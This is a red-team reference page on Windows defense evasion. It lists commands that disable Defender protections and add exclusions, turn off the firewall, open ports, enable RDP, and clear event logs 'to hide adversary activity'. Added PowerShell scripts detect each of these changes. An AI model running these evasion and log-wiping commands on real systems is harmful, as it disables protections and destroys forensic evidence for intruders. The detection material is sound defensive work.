Defense evasion

Windows Defender

The following PowerShell commands can be used to add an exclusion path and to switch off Windows Defender real-time protection (and, optionally, the other protections offered by Microsoft Defender):

# Add the specified folder to Windows Defender's exclusion list.
# The exclusion list can be retrieved using: Get-MpPreference | Ft ExclusionPath
Add-MpPreference -ExclusionPath "<PATH>"

# Disables Windows Defender real-time protection.
Set-MpPreference -DisableRealtimeMonitoring $true

# Disables, in addition to real-time protection, various other protections offered by Microsoft Defender (scanning of scripts and downloaded files, automatic sample submission, etc.).
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
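The following script is an added example, not part of the original notes: it audits the local Microsoft Defender configuration for exactly the settings the commands above change, and pulls the Defender operational events that record such changes (5001 = real-time protection disabled, 5007 = configuration changed, 5013 = Tamper Protection blocked a change). It assumes the Defender PowerShell module cmdlets (Get-MpComputerStatus, Get-MpPreference) are available and that the session is elevated. One caveat worth keeping in mind: when Tamper Protection is enabled, Set-MpPreference changes to real-time protection are ignored and the attempt is logged, which is why the script reports the IsTamperProtected state first.

```powershell
# Added example (not from the original notes): audit Defender for the changes
# the commands above make, and list the events that record them.
# Assumes the Defender module and an elevated session.
function Get-DefenderTamperingIndicators {
    [CmdletBinding()]
    param([int]$LookbackHours = 24)

    $status   = Get-MpComputerStatus
    $pref     = Get-MpPreference
    $findings = New-Object System.Collections.Generic.List[string]

    # Configuration checks, each mapped to one of the Set-MpPreference switches above.
    if (-not $status.RealTimeProtectionEnabled) { $findings.Add('Real-time protection is disabled') }
    if (-not $status.IsTamperProtected)         { $findings.Add('Tamper Protection is off: Set-MpPreference changes are not blocked') }
    if ($pref.DisableScriptScanning)            { $findings.Add('Script scanning is disabled') }
    if ($pref.DisableIOAVProtection)            { $findings.Add('Downloaded file / attachment (IOAV) scanning is disabled') }
    if ($pref.DisableIntrusionPreventionSystem) { $findings.Add('Network inspection (IPS) is disabled') }
    if ($pref.MAPSReporting -eq 0)              { $findings.Add('Cloud (MAPS) reporting is disabled') }
    if ($pref.SubmitSamplesConsent -eq 2)       { $findings.Add('Sample submission is set to NeverSend') }
    foreach ($p in @($pref.ExclusionPath))    { if ($p) { $findings.Add("Path exclusion present: $p") } }
    foreach ($p in @($pref.ExclusionProcess)) { if ($p) { $findings.Add("Process exclusion present: $p") } }

    # Defender keeps its own audit trail in its operational channel:
    # 5001 real-time protection disabled, 5007 configuration changed (new exclusions included),
    # 5013 Tamper Protection blocked a change.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5007, 5013
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    }
    $events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, @{ n = 'Detail'; e = { ($_.Message -split "`r?`n")[0] } }

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        Findings     = $findings
        RecentEvents = @($events)
    }
}

# Usage (elevated PowerShell session):
$report = Get-DefenderTamperingIndicators -LookbackHours 72
$report.Findings
$report.RecentEvents | Format-Table -AutoSize
```

The Findings list is empty on a host whose Defender configuration is untouched; 5007 events are also generated by legitimate policy changes, so they are best correlated with the account and process that raised them rather than alerted on alone.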

Windows Firewall

To check whether the Windows Firewall is enabled on a server or computer, the following commands can be used as Administrator / SYSTEM:

# Show the profile applied to each network adapter
netsh advfirewall monitor show currentprofile

# Windows Firewall state for all profiles (Public / Domain / Private)
netsh advfirewall show allprofiles
Get-NetFirewallProfile

# Show all rules for the given profile
netsh advfirewall firewall show rule profile=<public | private | domain | any | ...> name=all
Get-NetFirewallProfile -Name <Public | Private | Domain | * | ...> | Get-NetFirewallRule

By default, three separate listings are present: Domain profile settings, Private profile settings and Public profile settings. With the Private profile, applied to a network adapter when it is connected to a network that the user or administrator has identified as a private network, Windows enables network discovery features, allows file sharing and other networked features. The Public profile, applied to a network adapter by default or when specified so by a user or administrator, is the most restrictive profile. In the default Public profile, Windows blocks all inbound connections to programs that are not on the list of allowed programs. Finally, the Domain profile is used when a server or computer is joined to an Active Directory domain. In this environment, firewall settings are typically (but not necessarily) controlled by a network administrator.

Windows blocks inbound connections and allows outbound connections for all profiles by default.

To disable the firewall use the following commands:

# Disable current profile
netsh advfirewall set currentprofile state off

# Disable all profiles
netsh advfirewall set allprofiles state off
Set-NetFirewallProfile -All -Enabled False

# Disable the private, public and domain profiles
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set domainprofile state off
Set-NetFirewallProfile -Profile <Domain | Private | Public | PROFILE NAME> -Enabled False

To open a specific port, or a range, use the following command:

netsh advfirewall firewall add rule name="<RULE_NAME>" protocol=TCP dir=in localport=<PORT> action=allow

Activate RDP

RDP can be enabled / disabled without the need to restart the system with the reg utility:

# Check if RDP is enabled
netstat /p tcp /a | findstr 3389
# If RDP is enabled, registry value should be equal to 0x0
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
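As an added example covering both the Windows Firewall and the RDP sections above (not part of the original notes), the following script reports the firewall posture and RDP exposure of the local host: the state and default actions of each profile, the enabled inbound allow rules with the ports they open, the fDenyTSConnections and UserAuthentication (NLA) registry values, whether something listens on TCP/3389, the state of the "Remote Desktop" rule group, and the firewall change events (2003 = profile setting changed, 2004 = rule added, 2006 = rule deleted). It assumes the NetSecurity module (Get-NetFirewallProfile, Get-NetFirewallRule) and an elevated session; the registry paths and rule group are the ones referenced in the notes.

```powershell
# Added example (not from the original notes): firewall and RDP exposure report.
# Assumes the NetSecurity module and an elevated session.
function Get-HostExposureReport {
    [CmdletBinding()]
    param([int]$LookbackHours = 24)

    # 1. Per-profile state: a disabled profile or an inbound default of Allow is the red flag.
    $profiles = Get-NetFirewallProfile | ForEach-Object {
        [pscustomobject]@{
            Profile         = $_.Name
            Enabled         = [bool]$_.Enabled
            InboundDefault  = $_.DefaultInboundAction
            OutboundDefault = $_.DefaultOutboundAction
        }
    }

    # 2. Enabled inbound allow rules and the ports they open (what "add rule ... action=allow" creates).
    $inboundAllow = Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue |
        ForEach-Object {
            $port = $_ | Get-NetFirewallPortFilter
            [pscustomobject]@{
                Rule      = $_.DisplayName
                Group     = $_.DisplayGroup
                Protocol  = $port.Protocol
                LocalPort = (@($port.LocalPort) -join ',')
            }
        }

    # 3. RDP: registry switch, NLA requirement, listening socket and the rule group the notes enable.
    $tsKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny     = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    $nla      = (Get-ItemProperty -Path "$tsKey\WinStations\RDP-Tcp" -Name UserAuthentication -ErrorAction SilentlyContinue).UserAuthentication
    $listen   = Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue
    $rdpRules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue

    # 4. Firewall change events: 2003 profile setting changed, 2004 rule added, 2006 rule deleted.
    $fwEvents = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'
        Id        = 2003, 2004, 2006
        StartTime = (Get-Date).AddHours(-$LookbackHours)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id

    [pscustomobject]@{
        Profiles             = @($profiles)
        InboundAllowRules    = @($inboundAllow)
        RdpEnabledInRegistry = ($deny -eq 0)
        RdpNlaRequired       = ($nla -eq 1)
        RdpListening         = [bool]$listen
        RdpRulesEnabled      = @($rdpRules | Where-Object { $_.Enabled -eq 'True' }).Count
        FirewallChanges      = @($fwEvents)
    }
}

# Usage (elevated PowerShell session):
$r = Get-HostExposureReport -LookbackHours 72
$r.Profiles | Format-Table -AutoSize
$r | Select-Object RdpEnabledInRegistry, RdpNlaRequired, RdpListening, RdpRulesEnabled
$r.FirewallChanges | Format-Table -AutoSize
```

A host where RDP was switched on with the commands above shows RdpEnabledInRegistry and RdpListening as True and a non-zero RdpRulesEnabled count; RdpNlaRequired being False on top of that means the login screen is reachable before authentication, which the RemoteConnectionManager channel listed in the next section records.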

Windows logs clearing

Windows event logs track the activity and a number of operations conducted on the system.

The following notable hives, located in %systemroot%\System32\winevt\Logs, may be of interest for forensic analysis (and should thus be deleted in priority to hide adversary activity):

  • Security.evtx: users logon / logoff, local accounts and groups operations, process creation with command line if activated, etc.

  • System.evtx: Windows service operations (creation, execution, deletion, etc.)

  • Windows PowerShell.evtx and Microsoft-Windows-PowerShell%4Operational.evtx: PowerShell activity, with a varying level of information depending on the system configuration (activation of non-default Module Logging, Script Block Logging, etc.)

  • Microsoft-Windows-TaskScheduler%4Operational.evtx: scheduled tasks operations (registration, execution, deletion, etc.).

  • Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx, Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx, and Microsoft-Windows-RemoteDesktopServices-RdpCoreTS%4Operational.evtx: RDP activity, such as access to the Windows login screen and remote interactive logons.

  • Microsoft-Windows-WinRM%4Operational.evtx: WinRM activity (inbound and outbound remote sessions, notably PowerShell remoting).

  • Microsoft-Windows-Shell-Core%4Operational.evtx: programs executed through the Run / RunOnce ASEPs registry keys.

  • Microsoft-Windows-AppLocker%4EXE and DLL.evtx and Microsoft-Windows-AppLocker%4MSI and Script.evtx (and other Microsoft-Windows-AppLocker%4*.evtx): execution of binaries and scripts if AppLocker is activated in Audit only mode (non-default).

Note that upon clearing of some EVTX hives (such as the Security and System hives), specific events are generated to keep a trace of the log clearing. Refer to the [DFIR] Windows - EVTX integrity note for more information on the Windows events generated by event log clearing.

# Clears the specified hive using the wevtutil built-in utility.
wevtutil cl <security | system | HIVE_NAME>

# Clears the specified hive using the Clear-EventLog PowerShell cmdlet.
Clear-EventLog -LogName <Security | System | HIVE_NAME>

# Clears all the classic event logs listed by Get-EventLog -List.
$AllLogs = Get-EventLog -List | ForEach-Object {$_.Log}
$AllLogs | ForEach-Object {Clear-EventLog -LogName $_ }
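The following script is an added example, not part of the original notes: it looks for the trace that log clearing leaves behind on the local host. It first retrieves the two events Windows writes after a clear (Security 1102, "The audit log was cleared", and System 104, "The <log> log file was cleared"), extracting the clearing account and the cleared channel from the event XML, then inspects the channels listed above for an empty log or a suspiciously recent oldest record. The channel names are those of the notes; the 7-day age threshold is an assumption to tune per environment, and an elevated session is required to read the Security log.

```powershell
# Added example (not from the original notes): detect event log clearing.
# Assumes an elevated session; threshold values are assumptions.
function Get-LogClearingIndicators {
    [CmdletBinding()]
    param([int]$MinExpectedAgeDays = 7, [int]$LookbackDays = 30)

    $since = (Get-Date).AddDays(-$LookbackDays)

    # Security 1102 and System 104 are written after the clear, so they survive it
    # and carry the clearing account in UserData/LogFileCleared.
    $clearEvents = @(
        Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 1102; StartTime = $since } -ErrorAction SilentlyContinue
        Get-WinEvent -FilterHashtable @{ LogName = 'System';   Id = 104;  StartTime = $since } -ErrorAction SilentlyContinue
    ) | ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
        [pscustomobject]@{
            TimeCreated = $_.TimeCreated
            Log         = $_.LogName
            Id          = $_.Id
            Account     = if ($data) { "$($data.SubjectDomainName)\$($data.SubjectUserName)" } else { $_.UserId }
            Cleared     = if ($data -and $data.Channel) { $data.Channel } else { 'Security' }
        }
    }

    # Channels from the notes (%4 in the file names is the '/' of the channel name).
    $channels = @(
        'Security', 'System', 'Windows PowerShell',
        'Microsoft-Windows-PowerShell/Operational',
        'Microsoft-Windows-TaskScheduler/Operational',
        'Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational',
        'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational',
        'Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational',
        'Microsoft-Windows-WinRM/Operational',
        'Microsoft-Windows-Shell-Core/Operational'
    )

    # A cleared channel is empty or only holds very recent records. A log that has
    # wrapped after reaching its maximum size looks similar, so IsLogFull is reported too.
    $gaps = foreach ($c in $channels) {
        $log = Get-WinEvent -ListLog $c -ErrorAction SilentlyContinue
        if (-not $log) { continue }
        $oldest = Get-WinEvent -LogName $c -Oldest -MaxEvents 1 -ErrorAction SilentlyContinue
        $recentStart = $oldest -and ($oldest.TimeCreated -gt (Get-Date).AddDays(-$MinExpectedAgeDays))
        [pscustomobject]@{
            Channel     = $c
            RecordCount = $log.RecordCount
            OldestEvent = if ($oldest) { $oldest.TimeCreated } else { $null }
            LogFull     = $log.IsLogFull
            Suspicious  = ($log.RecordCount -eq 0) -or ($recentStart -and -not $log.IsLogFull)
        }
    }

    [pscustomobject]@{
        ClearEvents = @($clearEvents)
        Channels    = @($gaps)
    }
}

# Usage (elevated PowerShell session):
$ind = Get-LogClearingIndicators
$ind.ClearEvents | Format-Table -AutoSize
$ind.Channels | Where-Object Suspicious | Format-Table -AutoSize
```

On a freshly built host every channel legitimately has a recent oldest event, so the Suspicious column is meaningful only once the host is older than MinExpectedAgeDays; forwarding the 1102 and 104 events off-host (for example with Windows Event Forwarding) is what keeps them available when the local logs are cleared again afterwards.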

https://github.com/QAX-A-Team/EventCleaner


Last updated 3 years ago